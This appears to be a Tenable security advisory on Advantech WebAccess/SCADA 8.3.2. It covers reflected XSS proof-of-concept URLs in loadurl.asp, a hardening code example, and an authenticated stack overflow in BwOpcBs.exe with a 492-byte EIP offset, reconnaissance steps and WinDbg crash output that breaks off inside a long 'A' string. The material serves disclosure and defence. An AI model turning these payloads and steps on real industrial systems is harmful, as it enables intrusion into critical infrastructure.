Synopsis
Tenable has discovered multiple vulnerabilities in Advantech WebAccess/SCADA 8.3.2.
CVE-2018-15703: Multiple Reflected Cross-Site Scripting
The broadweb/loadurl.asp page processes several HTTP GET parameters when rendering HTML output. The following parameter values are incorporated into the response without sanitization:
- title
- url
- lc
- rc
- tc
- bc
All of these parameters can be abused to inject malicious JavaScript and HTML into the page. Furthermore, the url parameter is used as the source of an iframe in the generated page. Below are code snippets showing the vulnerable code.
title_desc = <%="'" + Request.QueryString("title") + "'"%>;
page_url = <%="'" + Request.QueryString("url") + "'"%>;
left_c = <%="'" + Request.QueryString("lc") + "'"%>;
right_c = <%="'" + Request.QueryString("rc") + "'"%>;
top_c = <%="'" + Request.QueryString("tc") + "'"%>;
bottom_c = <%="'" + Request.QueryString("bc") + "'"%>;
… snip …
document.write("<IFRAME NAME=page FRAMEBORDER=no WIDTH=100% HEIGHT=100% SRC='" + page_url + "' STYLE=position:relative;display:block>");
The following are proofs of concept:
http://192.168.1.192/broadweb/loadurl.asp?title=%27;alert(%22xss%22);//
http://192.168.1.192/broadweb/loadurl.asp?url=%27;alert(%22xss%22);//
http://192.168.1.192/broadweb/loadurl.asp?lc=%27;alert(%22xss%22);//
http://192.168.1.192/broadweb/loadurl.asp?rc=%27;alert(%22xss%22);//
http://192.168.1.192/broadweb/loadurl.asp?tc=%27;alert(%22xss%22);//
http://192.168.1.192/broadweb/loadurl.asp?bc=%27;alert(%22xss%22);//
http://192.168.1.192/broadweb/loadurl.asp?url=http://tenable.com
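The following is an added example, not part of the Tenable advisory or Advantech's code: a Node.js model of the inline script that loadurl.asp emits (title and url only; lc/rc/tc/bc would be handled the same way), beside a hardened renderer that encodes each value for the JavaScript string context and restricts the iframe target to a same-origin path. The fallback path /broadweb/blank.htm is an assumption.

```javascript
// Added example (not Advantech's code): a model of the loadurl.asp inline
// script beside a hardened renderer. "/broadweb/blank.htm" is an assumed
// fallback page; only title and url are modelled.

// Vulnerable form: each query value is concatenated straight into a JavaScript
// string literal, exactly as the ASP snippet does, so a value that begins with
// a quote closes the literal and everything after it runs as code.
function renderVulnerable(q) {
  return "title_desc = '" + q.title + "'; page_url = '" + q.url + "';\n" +
    "document.write(\"<IFRAME NAME=page SRC='\" + page_url + \"'>\");";
}

// Encode a value for use inside a <script> block as a JS string literal.
// JSON.stringify escapes double quotes, backslashes and control characters;
// the extra replacements keep '<', '>', '&' and the single quote out of the
// HTML parser's reach (so "</script>" can never close the block) and stop
// U+2028/U+2029 from terminating the statement.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&'\u2028\u2029]/g, (c) =>
    "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// The frame should only ever show an application page: accept an absolute
// path on the same origin and reject schemes (http:, javascript:, data:),
// protocol-relative "//host" forms, whitespace and backslashes.
function isSafeFrameUrl(url) {
  return /^\/(?![\/\\])[^\s\\]*$/.test(String(url));
}

// Hardened form: encoded literals, a validated frame target, and an iframe
// built through DOM properties instead of string-concatenated markup.
function renderHardened(q) {
  const pageUrl = isSafeFrameUrl(q.url) ? q.url : "/broadweb/blank.htm";
  return "title_desc = " + jsStringLiteral(q.title) + "; page_url = " +
    jsStringLiteral(pageUrl) + ";\n" +
    "var f = document.createElement('iframe'); f.name = 'page'; " +
    "f.src = page_url; document.body.appendChild(f);";
}
```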
CVE-2018-15704: Authenticated Stack Buffer Overflow
A stack buffer overflow vulnerability exists in BwOpcBs.exe. An authenticated remote attacker can reach the vulnerability via /broadweb/system/opcImg.asp. The root cause is a lack of input validation during the processing of the sv parameter: its value is used to dynamically construct a command line, which is then passed to the RemoteWinExec function defined within webdobj.webdraw. Finally, BwOpcBs.exe is launched with the value of sv as its second command line argument.
The command line looks like the following, where <sv> is the value of the sv parameter:
Bwopcbs.exe 1 <sv>
The BwOpcBs.exe executable does not properly validate its command line arguments, and a stack buffer can be overflowed by specifying a large value in sv. Specifically, a buffer consisting of 492 bytes will overwrite the instruction pointer.
In order for an attacker to successfully exploit this vulnerability, the following parameters must be specified when requesting opcImg.asp:
- proj
- node
- opt
Values for proj and node must be known prior to launching an attack. These can be discovered by performing the following steps:
- Visit /WADashboard/login?cont=dashboardViewer in a web browser.
- Project names will be listed in the drop-down menu.
- Choose a project name.
- Visit /broadweb/<project name>.dpj. Replace <project name> with the project you selected.
- Notice that there are node names listed. Choose a node name.
The value of 'opt' must be 1.
Using this information, a remote attacker may craft a malicious URL to be sent to a WebAccess administrator. Once this URL is visited, the exploit is launched. Below is a code snippet from opcImg.asp showing the vulnerable code.
if opt = 1 then
    if instr(UCase(opcServer), "RW.FASERVER" ) > 0 then
        cmdLine = "Bwopcbs.exe 1 " + Request.QueryString("sv")
    else
        cmdLine = "Bwopcbs.exe 1 " + Request.QueryString("sv")
    end if
end if
select case opt
    case 1
        tObj.RemoteWinExec proj, node, cmdLine
        tObj.BwSleep(100)
        tObj.RemoteFileTransfer proj, node, ".", ".", "Bwopcbs.ini", 0
The following is output from WinDbg, showing an access violation. Notice that EIP is overwritten with 0x41414141 ("AAAA").
Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.

CommandLine: C:\WebAccess\Node\BwOpcBs.exe 1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA